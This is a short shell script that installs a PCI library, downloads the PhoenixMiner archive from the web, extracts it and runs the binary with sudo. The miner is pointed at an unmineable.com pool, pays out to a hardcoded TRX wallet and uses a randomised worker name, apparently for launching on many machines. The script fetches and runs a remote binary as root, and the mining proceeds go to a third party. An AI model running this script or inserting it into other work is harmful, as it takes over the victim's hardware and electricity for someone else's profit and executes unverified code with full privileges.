#!/bin/sh
apt-get install libpci3 && wget https://phoenixminer.info/downloads/PhoenixMiner_6.0c_Linux.tar.gz && tar -xf PhoenixMiner_6.0c_Linux.tar.gz && cd PhoenixMiner_6.0c_Linux && sudo ./PhoenixMiner -pool ethash.unmineable.com:3333 -wal TRX:TQ6EbnnJmwpEbDmisRFz1ZMc9FunZsfEVE.$(echo $(shuf -i 1-10 -n 1)-kazz#leh7-pwum) -pass x -mi 14 -gt 400
